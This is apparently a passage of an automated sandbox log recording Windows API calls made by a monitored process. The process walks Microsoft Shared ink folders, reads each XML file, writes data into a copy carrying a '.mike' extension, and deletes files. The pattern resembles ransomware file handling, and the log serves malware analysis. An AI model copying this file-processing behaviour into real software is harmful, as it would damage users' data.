shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.203] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0046.203] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0046.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.204] GetFileType (hFile=0x264) returned 0x1 [0046.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0046.204] GetFileType (hFile=0x264) returned 0x1 [0046.204] CloseHandle (hObject=0x264) returned 1 [0046.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.204] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.204] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0046.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0046.204] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0046.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.204] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x229a374 | out: lpFileInformation=0x229a374*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d)) returned 1 [0046.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.205] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x229a6f0 | out: lpFileInformation=0x229a6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d)) returned 1 [0046.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.205] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.205] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0046.205] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0046.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0046.206] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.206] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.206] GetFileType (hFile=0x264) returned 0x1 [0046.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.206] GetFileType (hFile=0x264) returned 0x1 [0046.206] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0046.206] WriteFile (in: hFile=0x264, lpBuffer=0x229b7ec*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x229b7ec*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0046.207] CloseHandle (hObject=0x264) returned 1 [0046.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0046.207] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), fInfoLevelId=0x0, lpFileInformation=0x229b25c | out: lpFileInformation=0x229b25c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d)) returned 1 [0046.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0046.207] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0046.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.208] GetFileType (hFile=0x264) returned 0x1 [0046.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0046.208] GetFileType (hFile=0x264) returned 0x1 [0046.208] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0046.208] ReadFile (in: hFile=0x264, lpBuffer=0x229c94c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x229c94c*, lpNumberOfBytesRead=0x2af038*=0x59d, lpOverlapped=0x0) returned 1 [0046.209] CloseHandle (hObject=0x264) returned 1 [0046.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0046.210] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.210] GetFileType (hFile=0x264) returned 0x1 [0046.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0046.210] GetFileType (hFile=0x264) returned 0x1 [0046.210] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0046.210] WriteFile (in: hFile=0x264, lpBuffer=0x22a19d4*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x22a19d4*, lpNumberOfBytesWritten=0x2af02c*=0x5a0, lpOverlapped=0x0) returned 1 [0046.210] CloseHandle (hObject=0x264) returned 1 [0046.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0046.211] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0046.212] GetFileType (hFile=0x264) returned 0x1 [0046.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0046.212] GetFileType (hFile=0x264) returned 0x1 [0046.213] WriteFile (in: hFile=0x264, lpBuffer=0x22a4c34*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x22a4c34*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0046.213] CloseHandle (hObject=0x264) returned 1 [0046.213] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0046.214] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bde760, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bde760, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c048c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0046.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0046.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0046.214] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22a64f8 | out: lpFileInformation=0x22a64f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bde760, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bde760, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c048c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0046.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0046.214] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", dwFileAttributes=0x80) returned 0 [0046.215] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.215] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0046.215] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5bde760, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5bde760, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c048c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x7c0)) returned 1 [0046.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0046.215] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml", lpFilePart=0x0) returned 0x5c [0046.216] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike", lpFilePart=0x0) returned 0x61 [0046.216] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.mike")) returned 1 [0046.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.217] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad", lpFilePart=0x0) returned 0x4a [0046.217] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\", nBufferLength=0x105, lpBuffer=0x2aec38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\", lpFilePart=0x0) returned 0x4b [0046.217] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\osknumpad\\*", lpFindFileData=0x2aee84 | out: lpFindFileData=0x2aee84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5bde760, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c048c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d1060 [0046.217] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe5bde760, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe5c048c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.217] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 1 [0046.217] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aee94 | out: lpFindFileData=0x2aee94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fdda123, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fdda123, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fdda123, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0x0, dwReserved1=0x0, cFileName="osknumpadbase.xml", cAlternateFileName="")) returned 0 [0046.217] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0046.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0046.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af128) returned 1 [0046.217] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\.", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", lpFilePart=0x0) returned 0x48 [0046.218] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0046.218] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.218] CoTaskMemFree (pv=0x4fe370) [0046.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", nBufferLength=0x105, lpBuffer=0x2aec94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", lpFilePart=0x0) returned 0x48 [0046.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af15c) returned 1 [0046.218] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft 